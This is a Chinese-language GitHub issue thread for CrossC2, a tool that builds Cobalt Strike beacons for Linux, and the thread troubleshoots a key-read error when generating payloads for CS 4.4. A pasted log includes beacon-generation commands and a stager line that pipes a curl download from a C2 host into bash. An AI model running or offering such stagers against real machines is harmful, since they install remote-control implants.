### ISSUE TITLE
CS4.4 windows下无法生成payload，报错如下

### ISSUE THREAD

**Issue by xxxxxx-oss** [gloxec/CrossC2#119]
CrossC2 v2.2.5#stable  @hook
{cs >= 4.1}
read keys error!
generate beacon keys error
*[error] : read key error

**Comment by gloxec** [comment]
参考: *[error] : read key error #86

**Comment by xxxxxx-oss** [comment]
就是本地也无法生成呢，下面是在CS里面的日志，原主题是在本地生成时的报错。

09/16 00:15:37 *** D:/CrossC2/genCrossC2.Win/genCrossC2.Win.exe x.x.x.x 443 G:\.cobaltstrike.beacon_keys null Linux x64 g:/111
09/16 00:15:38 *** genCrossC2 beacon ->                 CrossC2 v2.2.5#stable  @hook
09/16 00:15:38 *** D:/CrossC2/genCrossC2.Win/genCrossC2.Win.exe x.x.x.x 443 G:\.cobaltstrike.beacon_keys null Linux-lib x64 g:/111.lib
09/16 00:15:38 *** genCrossC2 libbeacon ->                 CrossC2 v2.2.5#stable  @hook
09/16 00:15:38 *** xxx hosted CrossC2 beacon: reverse-https Linux x64 { HTTPS }[http] @ https://x.x.x.x:55413/vjWKPzVvTW
09/16 00:15:38 *** create listener: CrossC2 beacon: reverse-https Linux x64 { HTTPS }
09/16 00:15:54 *** 
09/16 00:15:54 *** CrossC2 curl script: curl -A O -o- -L https://x.x.x.x:55413/a | bash -s

**Comment by gloxec** [comment]
同样的问题，该错误都是因为传入的key文件不存在或者路径无法访问，或者无权限访问。
> D:/CrossC2/genCrossC2.Win/genCrossC2.Win.exe x.x.x.x 443 G:.cobaltstrike.beacon_keys

这里的`G:.cobaltstrike.beacon_keys`明显为错误路径，你需要选定的真实路径应当为`G:\.cobaltstrike.beacon_keys`这种，确保cmd中`dir G:\.cobaltstrike.beacon_keys`或`type`时可以看到文件路径正确

**Comment by xxxxxx-oss** [comment]
我想说这个斜杠是我编辑的时候写错了，本来是有的，4.3的key可以生成，但就是4.4不行

**Comment by gloxec** [comment]
那我去测试下4.4，查看key结构信息是否有变化

**Comment by gloxec** [comment]
请尝试Linux下使用链接文件可否生成4.4的beacon(删除zip后缀即可)
[genCrossC2_4.4.Linux.removeZIP.zip](https://github.com/gloxec/CrossC2/files/7386795/genCrossC2_4.4.Linux.removeZIP.zip)

**Comment by gloxec** [comment]
Release v3.0.2 已添加支持cs4.4

**Comment by Snowst0rm** [comment]
你好!可以上线.但是文件管理格式不对,如根目录是run\  打开任意目录如root就会出现,run\/root/,并且显示错误
